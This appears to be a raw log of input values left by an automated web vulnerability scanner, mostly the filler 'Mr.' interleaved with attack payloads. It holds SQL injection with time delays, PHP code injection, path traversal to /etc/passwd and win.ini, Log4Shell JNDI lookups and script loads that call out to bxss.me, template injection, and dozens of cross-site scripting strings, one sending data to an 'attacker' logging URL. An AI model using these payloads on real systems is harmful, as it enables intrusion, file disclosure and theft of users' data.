Mr.

Mr.

Mr.

Mr.

http://hitishcdcvgzy.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create/.

create

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

${@print(md5(31337))}

';print(md5(31337));$a='

Mr.

Mr.

";print(md5(31337));$a="

'.print(md5(31337)).'

${@print(md5(31337))}\

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1'"

@@lTmek

1%00%C0%A7%C0%A2%252527%252522

ITTGg7mj')) OR 163=(SELECT 163 FROM PG_SLEEP(15))--

093DrlzC') OR 475=(SELECT 475 FROM PG_SLEEP(15))--

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

!(()&&!|*|*|

WNRjw0av' OR 506=(SELECT 506 FROM PG_SLEEP(15))--

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

)

-1" OR 2+661-661-1=0+0+0+1 --

Iz9JlSJA'; waitfor delay '0:0:15' --

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

-1' OR 2+327-327-1=0+0+0+1 --

Mr.

Mr.

1 waitfor delay '0:0:15' --

Mr.

^(#$!@#$)(()))******

-1' OR 2+242-242-1=0+0+0+1 or 'lMVZllUw'='

-1 OR 2+571-571-1=0+0+0+1 --

Mr.

Mr.

-1 OR 2+495-495-1=0+0+0+1

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me

Mr.

http://bxss.me/t/fit.txt?.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Http://bxss.me/t/fit.txt

Mr.

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999100+9999775}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

<!--

Mr.

Mr.

Mr.

Mr.

'"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

http://hitguznryemfg.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create

Mr.

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

bxss.me/t/xss.html?%00

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

';print(md5(31337));$a='

${@print(md5(31337))}\

${@print(md5(31337))}

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

'.print(md5(31337)).'

";print(md5(31337));$a="

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

Mr.

!(()&&!|*|*|

Mr.

Mr.

)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Http://bxss.me/t/fit.txt

http://bxss.me/t/fit.txt?.

Mr.

bxss.me

1some_inexistent_file_with_long_name.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${10000145+9999615}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

"+response.write(9924309*9981525)+"

response.write(9924309*9981525)

Mr.

Mr.

Mr.

'+response.write(9924309*9981525)+'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitblqzdbubeza9615${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1Cfgg8PXQtO

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1'"

Mr.

Mr.

@@mMt51

Mr.

1%00%C0%A7%C0%A2%252527%252522

9Pz0MevF')) OR 480=(SELECT 480 FROM PG_SLEEP(15))--

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

wr9Y7QxH' OR 681=(SELECT 681 FROM PG_SLEEP(15))--

t3CwJKai') OR 986=(SELECT 986 FROM PG_SLEEP(15))--

QEfeCPmO'; waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

if(now()=sysdate(),sleep(15),0)

Mr.

-1' OR 2+723-723-1=0+0+0+1 --

-1 OR 2+17-17-1=0+0+0+1

-1 OR 2+979-979-1=0+0+0+1 --

-1' OR 2+216-216-1=0+0+0+1 or '0mn5KHHz'='

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

-1" OR 2+291-291-1=0+0+0+1 --

Mr.

Mr.

Mr.

../Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

"+response.write(9230319*9894462)+"

Mr.

Mr.

Mr.

'+response.write(9230319*9894462)+'

Mr.

Mr.

Mr.

Mr.

response.write(9230319*9894462)

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitgqkxzaxssocf6b7${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

在以下作业中:

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1yhyzCn28O

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9291842*9572590)

'+response.write(9291842*9572590)+'

"+response.write(9291842*9572590)+"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitxmtqculmmh890c0${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../../../windows/win.ini

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999290+9999851}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

-1 OR 2+838-838-1=0+0+0+1 --

-1 OR 2+43-43-1=0+0+0+1

-1' OR 2+721-721-1=0+0+0+1 --

)

-1' OR 2+998-998-1=0+0+0+1 or '53LkVzFe'='

!(()&&!|*|*|

-1" OR 2+592-592-1=0+0+0+1 --

^(#$!@#$)(()))******

if(now()=sysdate(),sleep(15),0)

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

1 waitfor delay '0:0:15' --

pFs08ZIH'; waitfor delay '0:0:15' --

mDcjfhRz' OR 705=(SELECT 705 FROM PG_SLEEP(15))--

AUXlModr') OR 772=(SELECT 772 FROM PG_SLEEP(15))--

69AeB0CH')) OR 754=(SELECT 754 FROM PG_SLEEP(15))--

Mr.

1'"

Mr.

1%00%C0%A7%C0%A2%252527%252522

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

@@MG1FE

1some_inexistent_file_with_long_name.

Mr.

Mr.

Http://bxss.me/t/fit.txt

Mr.

Mr.

http://bxss.me/t/fit.txt?.

Mr.

Mr.

bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

';print(md5(31337));$a='

";print(md5(31337));$a="

${@print(md5(31337))}

${@print(md5(31337))}\

'.print(md5(31337)).'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

Mr.

create

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

<!--

Mr.

Mr.

Mr.

Mr.

Mr.

http://hitlgpfeledkn.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitrqlemevslya692d${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9700174*9280701)

'+response.write(9700174*9280701)+'

"+response.write(9700174*9280701)+"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${9999475+9999615}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1some_inexistent_file_with_long_name.

Http://bxss.me/t/fit.txt

http://bxss.me/t/fit.txt?.

bxss.me

)

!(()&&!|*|*|

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

-1 OR 2+133-133-1=0+0+0+1 --

Mr.

-1 OR 2+652-652-1=0+0+0+1

Mr.

Mr.

-1' OR 2+830-830-1=0+0+0+1 --

Mr.

-1' OR 2+280-280-1=0+0+0+1 or 'mrRlLSoZ'='

-1" OR 2+613-613-1=0+0+0+1 --

'"()

if(now()=sysdate(),sleep(15),0)

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1 waitfor delay '0:0:15' --

Mr.

VM1SbHBy'; waitfor delay '0:0:15' --

Mr.

oZi8LA4q' OR 828=(SELECT 828 FROM PG_SLEEP(15))--

grsEQNlO') OR 687=(SELECT 687 FROM PG_SLEEP(15))--

Mr.

1v020AIF')) OR 320=(SELECT 320 FROM PG_SLEEP(15))--

1'"

1%00%C0%A7%C0%A2%252527%252522

@@Jveoz

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

';print(md5(31337));$a='

";print(md5(31337));$a="

${@print(md5(31337))}

${@print(md5(31337))}\

'.print(md5(31337)).'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create

create/.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

<!--

Mr.'"()&%<acx><ScRiPt >vPA0(9207)</ScRiPt>

'"()&%<acx><ScRiPt >vPA0(9185)</ScRiPt>

Mr.9589323

Mr.

Mr.

http://hitvavjwlzujl.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${j${::-n}di:dns${::-:}//hitjbquclpemlf2782${::-.}bxss.me}

Mr.

Mr.

Mr.

Mr.

Mr.

response.write(9336700*9457664)

'+response.write(9336700*9457664)+'

"+response.write(9336700*9457664)+"

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

../../../../../../../../../../../../../../etc/passwd

../../../../../../../../../../../../../../windows/win.ini

Mr.

Mr.

Mr.

../Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.<esi:include src="http://bxss.me/rpb.png"/>

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

${10000280+10000056}

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

1some_inexistent_file_with_long_name.

Http://bxss.me/t/fit.txt

http://bxss.me/t/fit.txt?.

bxss.me

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"()

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

)

Mr.

Mr.

!(()&&!|*|*|

Mr.

^(#$!@#$)(()))******

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

';print(md5(31337));$a='

";print(md5(31337));$a="

${@print(md5(31337))}

${@print(md5(31337))}\

'.print(md5(31337)).'

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >tOVw(9493)</ScRiPt>

Mr.

'"()&%<acx><ScRiPt >tOVw(9438)</ScRiPt>

Mr.

Mr.9015090

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

HttP://bxss.me/t/xss.html?%00

bxss.me/t/xss.html?%00

Mr.

Mr.

Mr.

Mr.

-1 OR 2+647-647-1=0+0+0+1 --

-1 OR 2+518-518-1=0+0+0+1

-1' OR 2+202-202-1=0+0+0+1 --

-1' OR 2+935-935-1=0+0+0+1 or 'w1I0anHw'='

Mr.

-1" OR 2+639-639-1=0+0+0+1 --

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

1 waitfor delay '0:0:15' --

0Hb2HBki'; waitfor delay '0:0:15' --

FbukP74A' OR 372=(SELECT 372 FROM PG_SLEEP(15))--

z9o22VvQ') OR 664=(SELECT 664 FROM PG_SLEEP(15))--

EjXcO9Z9')) OR 311=(SELECT 311 FROM PG_SLEEP(15))--

Mr.

1'"

1%00%C0%A7%C0%A2%252527%252522

@@98kEL

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

create

create

Mr.

create/.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

/xfs.bxss.me

Mr.

http://hitjndwcxrnrc.bxss.me/

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

'"

<!--

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >4D7L(9167)</ScRiPt>

'"()&%<acx><ScRiPt >4D7L(9241)</ScRiPt>

Mr.9568007

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.'"()&%<acx><ScRiPt >shfe(9133)</ScRiPt>

'"()&%<acx><ScRiPt >shfe(9053)</ScRiPt>

Mr.9240675

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

Mr.

acu6577<s1﹥s2ʺs3ʹuca6577

acux4066%C0%BEz1%C0%BCz2a%90bcxuca4066

<%={{={@{#{${acx}}%>

Mr.

<th:t="${acx}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

Mr.

acx{{98991*97996}}xca

acx[[${98991*97996}]]xca

acx__${98991*97996}__::.x

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

acu6424<s1﹥s2ʺs3ʹuca6424

acux3091%C0%BEz1%C0%BCz2a%90bcxuca3091

<%={{={@{#{${acx}}%>

Mr.

<th:t="${acx}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

Mr.

acx{{98991*97996}}xca

acx[[${98991*97996}]]xca

acx__${98991*97996}__::.x

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.<ScRiPt >shfe(9300)</ScRiPt>

Mr.<WT0QIU>CQAJY[!+!]</WT0QIU>

Mr.<script>shfe(9111)</script>

Mr.<ScR<ScRiPt>IpT>shfe(9242)</sCr<ScRiPt>IpT>

Mr.<ScRiPt >shfe(9515)</ScRiPt>

Mr.<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9063></ScRiPt>

Mr.<ScRiPt >shfe(9838)</ScRiPt>

Mr.<svg%09%0A%0B%0C%0D%A0%00onload=shfe(9722);>

Mr.<isindex type=image src=1 onerror=shfe(9033)>

Mr.<body onload=shfe(9906)>

Mr.<img src=//xss.bxss.me/t/dot.gif onload=shfe(9251)>

Mr.<img src=xyz OnErRor=shfe(9581)>

Mr.<img/src=">" onerror=alert(9477)>

Mr.\u003CScRiPt\shfe(9710)\u003C/sCripT\u003E

Mr.&lt;ScRiPt&gt;shfe(9674)&lt;/sCripT&gt;

%F6<img%20acu%20onmouseover=shfe(97321)%20//%F6>

Mr.<input autofocus onfocus=shfe(9257)>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

Mr.}body{acu:Expre/**/SSion(shfe(9740))}

Mr.0Y7HZ <ScRiPt >shfe(9171)</ScRiPt>

Mr.<WGRHXG>CFDLV[!+!]</WGRHXG>

Mr.<ifRAme sRc=9477.com></IfRamE>

Mr.<afTqZ5f x=9578>

Mr.<img sRc='http://attacker-9138/log.php?

Mr.<aM1cGPD<

Mr.9919'();}]9033

%4D%72%2E%39%31%31%30%27%28%29%3B%7D%5D%39%38%36%36

Mr.</script><script>shfe(9614)</script>

Mr.

Mr.

Mr.